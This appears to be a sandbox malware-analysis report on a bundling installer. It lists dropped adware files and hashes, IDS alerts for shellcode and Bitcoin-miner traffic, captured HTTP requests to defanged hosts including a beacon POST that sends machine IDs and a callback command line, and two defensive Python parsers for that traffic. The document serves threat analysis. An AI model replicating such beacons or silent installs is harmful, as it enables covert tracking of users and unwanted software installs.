| da6f5524c9e5b5804dc5117022d08331 | c:\Program Files (x86)\ActSys\ssleay32.dll |
| 84887ac0f5fde399c83b3bc5a7aaf097 | c:\Program Files (x86)\CashReminder\CashReminder.exe |
| d68a76ab1ebbbdde37bb12bd68b1639d | c:\Program Files (x86)\CashReminder\ProtocolFilters.dll |
| bec584303ce252396a3731ce5bdcf03a | c:\Program Files (x86)\CashReminder\libeay32.dll |
| d8305b5c2810e2e135f87bb32d62810e | c:\Program Files (x86)\CashReminder\nfapi.dll |
| 01b5780505301ada6dc102fb77b2298c | c:\Program Files (x86)\CashReminder\nfregdrv.exe |
| da6f5524c9e5b5804dc5117022d08331 | c:\Program Files (x86)\CashReminder\ssleay32.dll |
| f2f4090a44f85db92f9ec40483c7e502 | c:\Program Files (x86)\CashReminder\uninstall.exe |
| 45c9d00b83bcafd991f95eeac6097b7f | c:\Program Files (x86)\DesProtetor\DesProtetor.exe |
| 9a0c59099f8589ee0f026bcd42c06800 | c:\Program Files (x86)\DesProtetor\ProtocolFilters.dll |
| 3e1176c39139baf084e9a69d6d50438a | c:\Program Files (x86)\DesProtetor\libeay32.dll |
| 0e2ca4f2d3f113f006d5801319a626de | c:\Program Files (x86)\DesProtetor\nfapi.dll |
| 92a6df47283b49b207045fa7a4502bc1 | c:\Program Files (x86)\DesProtetor\nfregdrv.exe |
| 4fbf0e0dd471ce2945c33c14e14269ff | c:\Program Files (x86)\DesProtetor\ssleay32.dll |
| 28ca54fa79bb30e8eef8ebd5053ee746 | c:\Program Files (x86)\DesProtetor\uninst.exe |
| 9a0c59099f8589ee0f026bcd42c06800 | c:\Program Files (x86)\GOSafer\ProtocolFilters.dll |
| c1908176b417b29dcfcfc15d7de9de63 | c:\Program Files (x86)\GOSafer\gosafer.exe |
| 3e1176c39139baf084e9a69d6d50438a | c:\Program Files (x86)\GOSafer\libeay32.dll |
| 0e2ca4f2d3f113f006d5801319a626de | c:\Program Files (x86)\GOSafer\nfapi.dll |
| 92a6df47283b49b207045fa7a4502bc1 | c:\Program Files (x86)\GOSafer\nfregdrv.exe |
| 4fbf0e0dd471ce2945c33c14e14269ff | c:\Program Files (x86)\GOSafer\ssleay32.dll |
| 9d37509b72dc3143feffc3f1977c9d7d | c:\Program Files (x86)\GOSafer\uninst.exe |
| 9a0c59099f8589ee0f026bcd42c06800 | c:\Program Files (x86)\WNet\ProtocolFilters.dll |
| 45571677457a9bfd49aadada0fd91ca8 | c:\Program Files (x86)\WNet\WNet.exe |
| 3e1176c39139baf084e9a69d6d50438a | c:\Program Files (x86)\WNet\libeay32.dll |
| 8249371485714e1f45a4b1c67002cf47 | c:\Program Files (x86)\WNet\nfapi.dll |
| 92a6df47283b49b207045fa7a4502bc1 | c:\Program Files (x86)\WNet\nfregdrv.exe |
| 4fbf0e0dd471ce2945c33c14e14269ff | c:\Program Files (x86)\WNet\ssleay32.dll |
| 6200d767a099a1744e99abae47958a42 | c:\Program Files (x86)\WNet\uninst.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: g3CvT78vSMa0N0LPai7QvtmUwmghB
Product Name: g3CvT78vSMa0N0LPai7QvtmUw
Product Version:
Legal Copyright:
Legal Trademarks: g3CvT78vSMa0N0LP
Original Filename:
Internal Name:
File Version: 5.9.1.7
File Description:
Comments:
Language: Language Neutral
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 23130 | 23552 | 4.44841 | 0bc2ffd32265a08d72b795b18265828d |
| .rdata | 28672 | 4496 | 4608 | 3.59163 | f179218a059068529bdb4637ef5fa28e |
| .data | 36864 | 110488 | 1024 | 3.26405 | 975304d6dd6c4a4f076b15511e2bbbc0 |
| .ndata | 147456 | 40960 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 188416 | 3128 | 3584 | 2.77203 | 7eed741492caf0627f19fc4adb8750fe |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
SURICATA UDPv4 invalid checksum
SURICATA IPv4 invalid checksum
ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET POLICY W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message
ET POLICY W32/BitCoinMiner.MultiThreat Stratum Protocol Mining.Notify Work Server Response
SURICATA STREAM SHUTDOWN RST invalid ack
SURICATA STREAM Packet with invalid ack
ET MALWARE Suspicious Mozilla User-Agent - Likely Fake (Mozilla/4.0)
SURICATA STREAM FIN out of window
Traffic
GET /mobile/libacess_js.php?idm=R0JDNlBNS1RPRDo5MjMwMDA= HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.mobimidia.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:07:07 GMT
Server: Apache
X-Powered-By: PHP/5.3.14
Content-Length: 0
Connection: close
Content-Type: text/html
GET /registro/top-line.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:42 GMT
Content-Type: image/gif
Content-Length: 1724
Last-Modified: Mon, 08 Dec 2014 13:27:40 GMT
Connection: keep-alive
Expires: Sat, 30 May 2015 23:07:42 GMT
Cache-Control: max-age=2592000
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
GET /010914s/010914i.htm HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Connection: Keep-Alive
Host: VVV.4threquest.me
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:42 GMT
Content-Type: text/html
Last-Modified: Mon, 08 Dec 2014 13:27:43 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Content-Encoding: gzip
GET /010914s/verificar_ip.php HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:43 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
Content-Encoding: gzip
GET /010914s/contabilizar.php?id=230313 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:43 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: EXPIRED
CC: UA
Content-Encoding: gzip
GET /ids/id230313/stats_confirma.htm HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/contabilizar.php?id=230313
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: MISS
CC: UA
Content-Encoding: gzip
GET /i.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: t1.extreme-dm.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.7.10
Date: Thu, 30 Apr 2015 23:07:06 GMT
Content-Type: image/gif
Content-Length: 1004
Last-Modified: Thu, 26 Feb 2004 13:56:07 GMT
Connection: close
ETag: "403dfaf7-3ec"
Expires: Fri, 01 May 2015 23:07:06 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
POST /thankyou.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1308
Host: VVV.amoninst.com
_srvlog=&browser=ie&c[MyBestOffersTodayBR][r]=0.01&c[MyBestOffersTodayBR][s]=-1&c[updater][r]=0&c[updater][s]=-1&capp=updater&cc=UA&cid=9664&clip=193.138.244.231&cmdl=amisetup2899__9664.exe /s /ver 1.1.2.41 /u http://VVV.amoninst.com/index.php /ta /ci 9664 /i MyBestOffersTodayBR&cnt=3e5a8f2a30ab988ef7a611138130e98a&current_screen=Finish_Last_Screen&is=-31&netfs=-31&os=NT6.1SP1&sysid=915A4028688142931B5DDA64A4540CAD&sysid1=066389C9740F80692FC30C6511692204&te=1430435235&tid=&ts=1430435233&ver=1.1.2.41&vert=3&mhx=dd599d1761410d78de3549ee3ea8673841bec801&base=[removed]
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:15 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 14
Connection: keep-alive
[14-byte text/plain body omitted]
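The POST to VVV.amoninst.com above is the installer's completion beacon: a plain application/x-www-form-urlencoded body whose keys of the form c[<offer>][r] and c[<offer>][s] carry a per-offer result, and whose cmdl field is the full command line the installer was launched with, including the /u callback URL and the /i offer name. The parser below is an added example written for this page, not code from the report or from the installer. It uses only the Python standard library, takes the body exactly as captured (minus the base= field, which the report truncates), and the meanings attached to field names such as sysid, clip and cc are assumptions drawn from the names themselves.

```python
import re
from urllib.parse import parse_qsl

# Body of the POST /thankyou.php beacon as captured on this page. Constructed
# sample: the trailing base= field, which the report truncates, is left out.
THANKYOU_BODY = (
    "_srvlog=&browser=ie&c[MyBestOffersTodayBR][r]=0.01&c[MyBestOffersTodayBR][s]=-1"
    "&c[updater][r]=0&c[updater][s]=-1&capp=updater&cc=UA&cid=9664&clip=193.138.244.231"
    "&cmdl=amisetup2899__9664.exe /s /ver 1.1.2.41 /u http://VVV.amoninst.com/index.php"
    " /ta /ci 9664 /i MyBestOffersTodayBR"
    "&cnt=3e5a8f2a30ab988ef7a611138130e98a&current_screen=Finish_Last_Screen"
    "&is=-31&netfs=-31&os=NT6.1SP1&sysid=915A4028688142931B5DDA64A4540CAD"
    "&sysid1=066389C9740F80692FC30C6511692204&te=1430435235&tid=&ts=1430435233"
    "&ver=1.1.2.41&vert=3&mhx=dd599d1761410d78de3549ee3ea8673841bec801"
)

_BRACKET = re.compile(r"\[([^\]]*)\]")   # matches each [segment] of a PHP-style nested key


def parse_windows_cmdline(cmdl):
    """Split an 'exe /switch [value] ...' string into the executable and a switch map.

    A switch that is not followed by a non-switch token is recorded as True.
    Quoting is not handled; the captured command line contains none.
    """
    tokens = cmdl.split()
    if not tokens:
        return "", {}
    exe, args, i = tokens[0], {}, 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("/"):
            name = tok[1:]
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
                args[name] = tokens[i + 1]
                i += 2
            else:
                args[name] = True
                i += 1
        else:
            args.setdefault("_positional", []).append(tok)
            i += 1
    return exe, args


def parse_beacon(body):
    """Flatten the beacon into scalar fields, per-offer c[<offer>][r|s] results,
    and the parsed cmdl command line. Field semantics (sysid = install/machine id,
    clip = client IP, cc = country) are assumptions based on the names only."""
    fields, offers = {}, {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        if "[" in key:
            base = key[: key.index("[")]
            path = _BRACKET.findall(key)
            if base == "c" and len(path) == 2:
                offers.setdefault(path[0], {})[path[1]] = value
            else:
                fields[key] = value        # unknown bracketed key: keep verbatim
        else:
            fields[key] = value
    exe, args = parse_windows_cmdline(fields.get("cmdl", ""))
    return {"fields": fields, "offers": offers, "cmdl": {"exe": exe, "args": args}}


if __name__ == "__main__":
    beacon = parse_beacon(THANKYOU_BODY)
    print("client:", beacon["fields"]["clip"], beacon["fields"]["cc"], beacon["fields"]["os"])
    print("ids:", beacon["fields"]["sysid"], beacon["fields"]["sysid1"])
    print("offers:", beacon["offers"])
    print("cmdl:", beacon["cmdl"])
```

The /u value in cmdl is the same host the beacon is sent to, and the /i value matches the offer key in c[...], so one parsed beacon gives both the callback infrastructure and the offer that was pushed; the sysid and sysid1 values are the fields to pivot on when correlating several captures from the same installer family.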
GET //MEkwRzBFMEMwQTAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCGmkT8+Jklzi HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:51 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=120373, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 22:23:40 GMT
Expires: Sat, 02 May 2015 10:23:40 GMT
ETag: "befea096dacc08f0bc2d2ea14601c0a19709dbf1"
Content-Length: 1787
Connection: close
Content-Type: application/ocsp-response
[DER OCSP response, 1787 bytes, binary omitted; recoverable strings: responder DN values US / Arizona / Scottsdale / GoDaddy Inc. / Go Daddy Validation Authority - G2, producedAt 20150430222340Z, nextUpdate 20150502102340Z; embedded responder certificate issued by GoDaddy.com, Inc. / hXXp://certs.godaddy.com/repository/ / Go Daddy Secure Certificate Authority - G2, validity 150316070000Z to 160316070000Z, CRL hXXp://crl.godaddy.com/repository/mastergodaddy2issuing.crl]
<<< skipped >>>
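The OCSP GET above (and the second one to ocsp.godaddy.com further down the page) carries a base64-encoded DER OCSPRequest in the URL path, the GET form defined in RFC 6960 Appendix A, so the certificate being checked can be identified from the request line alone: the SHA-1 hashes of the issuer's name and key plus the certificate serial number. The decoder below is an added example written for this page, not part of the Lavasoft report or of any tool it mentions. It uses only the Python standard library, takes the two paths copied from the capture, and assumes the minimal DER shape CryptoAPI emits (no requestor name, extensions or signature), while still skipping those optional tagged members if present.

```python
import base64
from urllib.parse import unquote

# The two OCSP GET paths sent to ocsp.godaddy.com by Microsoft-CryptoAPI/6.1 on
# this page, copied from the capture (the leading "//" is how they appear there).
OCSP_GET_PATHS = [
    "//MEkwRzBFMEMwQTAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCGmkT8+Jklzi",
    "//MEowSDBGMEQwQjAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCQCRRRvT8MWO4g==",
]

HASH_OIDS = {"1.3.14.3.2.26": "sha1", "2.16.840.1.101.3.4.2.1": "sha256"}


def _read_tlv(buf, pos):
    """Read one DER tag-length-value at pos; return (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long-form length: next n bytes hold it
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def _children(value):
    """Split a constructed DER value into its [(tag, value), ...] members."""
    out, pos = [], 0
    while pos < len(value):
        tag, val, pos = _read_tlv(value, pos)
        out.append((tag, val))
    return out


def _decode_oid(raw):
    """Dotted-decimal form of a DER OBJECT IDENTIFIER value."""
    arcs, acc = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(acc)
            acc = 0
    return ".".join(map(str, arcs))


def parse_ocsp_get(path):
    """Decode an RFC 6960 OCSP GET path into the CertIDs it asks about.

    OCSPRequest ::= SEQUENCE { tbsRequest TBSRequest, optionalSignature [0] OPTIONAL }
    TBSRequest  ::= SEQUENCE { version [0] OPTIONAL, requestorName [1] OPTIONAL,
                               requestList SEQUENCE OF Request, requestExtensions [2] OPTIONAL }
    Request     ::= SEQUENCE { reqCert CertID, singleRequestExtensions [2] OPTIONAL }
    CertID      ::= SEQUENCE { hashAlgorithm AlgorithmIdentifier, issuerNameHash OCTET STRING,
                               issuerKeyHash OCTET STRING, serialNumber INTEGER }
    """
    # A DER SEQUENCE starts with 0x30, which is 'M' in base64, so stripping the
    # leading slashes of the path cannot eat part of the payload.
    der = base64.b64decode(unquote(path.lstrip("/")))
    tag, ocsp_request, _ = _read_tlv(der, 0)
    if tag != 0x30:
        raise ValueError("path does not decode to a DER SEQUENCE")
    tbs = _children(ocsp_request)[0][1]
    # requestList is the first plain SEQUENCE; [0] version and [1] requestorName
    # are context-tagged (0xA0 / 0xA1) and skipped if present.
    request_list = next(v for t, v in _children(tbs) if t == 0x30)
    cert_ids = []
    for _, request in _children(request_list):
        cert_id = _children(request)[0][1]
        (_, alg), (_, name_hash), (_, key_hash), (_, serial) = _children(cert_id)
        oid = _decode_oid(_children(alg)[0][1])
        cert_ids.append({
            "hash_alg": HASH_OIDS.get(oid, oid),
            "issuer_name_hash": name_hash.hex(),
            "issuer_key_hash": key_hash.hex(),
            # signed=True so a leading 0x00 (needed when the top bit is set) is not kept
            "serial": format(int.from_bytes(serial, "big", signed=True), "x"),
        })
    return cert_ids


def group_by_issuer(paths):
    """Map issuerKeyHash -> serial numbers queried, across several captured requests."""
    by_issuer = {}
    for path in paths:
        for cid in parse_ocsp_get(path):
            by_issuer.setdefault(cid["issuer_key_hash"], []).append(cid["serial"])
    return by_issuer


if __name__ == "__main__":
    for path in OCSP_GET_PATHS:
        print(parse_ocsp_get(path))
    print(group_by_issuer(OCSP_GET_PATHS))
```

Both paths decode to the same issuerNameHash and issuerKeyHash, so the two serial numbers belong to certificates from one issuing CA (the response residue names it as Go Daddy Secure Certificate Authority - G2). Matching those serials against the certificates on the executables the sandbox downloaded ties each revocation check to the file whose signature triggered it, which a plain host/URL list of the traffic cannot do.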
GET /registro/310113f8.htm HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:42 GMT
Content-Type: text/html
Last-Modified: Wed, 11 Mar 2015 17:29:02 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Content-Encoding: gzip
[chunked gzip-compressed HTML body omitted]
<<< skipped >>>
GET /registro/icone_cadeado.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:42 GMT
Content-Type: image/gif
Content-Length: 2256
Last-Modified: Mon, 08 Dec 2014 13:27:40 GMT
Connection: keep-alive
Expires: Sat, 30 May 2015 23:07:42 GMT
Cache-Control: max-age=2592000
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
[GIF89a image body, 2256 bytes, omitted]
<<< skipped >>>
GET /registro/carregando.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:42 GMT
Content-Type: image/gif
Content-Length: 4176
Last-Modified: Mon, 08 Dec 2014 13:27:40 GMT
Connection: keep-alive
Expires: Sat, 30 May 2015 23:07:42 GMT
Cache-Control: max-age=2592000
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
[GIF89a animated image body (NETSCAPE2.0 loop extension), 4176 bytes, omitted; embedded comment: "Created with ajaxload.info"]
<<< skipped >>>
GET /img/Global/declineBG.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 1527
Connection: keep-alive
x-amz-id-2: LsJpuXhB3IbHEy7ZHe7WV8uGeSQ9o9HFRMUuEjtSs00r6BYLEJZsLd1C2dR1aukm
x-amz-request-id: 93C41663D1D347D1
x-amz-meta-s3fox-filesize: 1527
x-amz-meta-s3fox-modifiedtime: 1385033566667
Last-Modified: Thu, 21 Nov 2013 11:43:23 GMT
x-amz-version-id: TJNGNP9J.pYgtH1WelxAjMHRSvYRyHyQ
ETag: "c3671f6a6b3932da75a4c6b57cd45614"
Accept-Ranges: bytes
[PNG image body, 1527 bytes, omitted; tEXt Software: Adobe ImageReady; XMP CreatorTool: Adobe Photoshop CS6 (Windows), DocumentID xmp.did:99574DB952A011E39674B18426DE0A96, OriginalDocumentID xmp.did:7496059F5C24E31185CEB55A04ED8505]
<<< skipped >>>
GET /img/Global/No_Button.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 1090
Connection: keep-alive
x-amz-id-2: 7WjnhU0tPyReiclfSk2lMFXKk a5jcICVQZv5/SuoOjs3rkF2ueCvAPmIZCZwiYU
x-amz-request-id: 7FCF11E31494066F
x-amz-meta-s3fox-filesize: 1090
x-amz-meta-s3fox-modifiedtime: 1380713503002
Last-Modified: Wed, 13 Nov 2013 16:12:45 GMT
x-amz-version-id: H1gWa5fQ5azVvHrSdifdTj_fe_Q1czxc
ETag: "4462e7ebdf4a24f57b288fbca0602dea"
Accept-Ranges: bytes
[PNG image body, 1090 bytes, omitted; tEXt Software: Adobe ImageReady; XMP CreatorTool: Adobe Photoshop CS6 (Windows), DocumentID xmp.did:2D2B0E0224EA11E392EFCCF1BDECC388]
<<< skipped >>>
GET /img/Sihehihi/Sihehihi_31_03_15.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 7421
Connection: keep-alive
x-amz-id-2: tb3wzOqbdaXKpKNL10W0GD7quW/G8dQsROYO1ZNZx4BSp/ WOCV6IN Tr7fFpLso
x-amz-request-id: 1A430C7BD6E060DF
x-amz-version-id: fwDsegYHRL0JOsa1HMn_zrCAJNbvgq_T
x-amz-meta-cb-modifiedtime: Tue, 31 Mar 2015 09:00:45 GMT
Last-Modified: Tue, 31 Mar 2015 09:01:01 GMT
ETag: "99901d117a18376c2cf58e46fe682679"
Accept-Ranges: bytes
[PNG image body, 7421 bytes, omitted; tEXt Software: Paint.NET v3.5.11]
<<< skipped >>>
GET /img/Rerarapepe/logo_new.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 4569
Connection: keep-alive
x-amz-id-2: i8ICCXz5aRAGTe6TbJWncaksmnn7Nf o0zWa6P1Emvu b2naXV5VqYrZ44fl/JsT
x-amz-request-id: F053A26F739ABFD6
x-amz-meta-s3fox-filesize: 4569
x-amz-meta-s3fox-modifiedtime: 1388397217065
Last-Modified: Mon, 30 Dec 2013 09:53:59 GMT
x-amz-version-id: FBdIFQNqjG8fAIwxlMklzjPUXqz3Asib
ETag: "3263ff057b8e7380f7579d5aaab2bfdc"
Accept-Ranges: bytes
[PNG image body, 4569 bytes, omitted; tEXt Software: Adobe ImageReady; XMP CreatorTool: Adobe Photoshop CS6 (Windows), DocumentID xmp.did:2A43320E713811E3B459B11FBD9400CD]
<<< skipped >>>
GET /img/Rerarapepe/Rerarapepe.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 3657
Connection: keep-alive
x-amz-id-2: Z0jI9oUtCmkwjhrm4fpr7I34XCbbJafI4wdwaCXRwxEFhVvEbJ9HB6a84y2LlhS6
x-amz-request-id: 6ABD9C086DAAC9E3
x-amz-meta-s3fox-filesize: 3657
x-amz-meta-s3fox-modifiedtime: 1402226184727
Last-Modified: Mon, 09 Jun 2014 14:19:41 GMT
x-amz-version-id: nXvqG1jeKyMVMqgSg3LnBI1CMsSqJwdV
ETag: "e568d92e622a3ac2f573a98d91df1421"
Accept-Ranges: bytes
[PNG image body, 3657 bytes, omitted; tEXt Software: Adobe ImageReady; XMP CreatorTool: Adobe Photoshop CS6 (Windows), DocumentID xmp.did:2D84B53CEEFE11E39491D45C0DAE79C8]
<<< skipped >>>
GET /pki/crl/products/WinPCA.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com
HTTP/1.1 200 OK
Content-Type: application/pkix-crl
Last-Modified: Sat, 07 Mar 2015 06:01:44 GMT
Accept-Ranges: bytes
ETag: "dde36a309c58d01:0"
Server: Microsoft-IIS/8.0
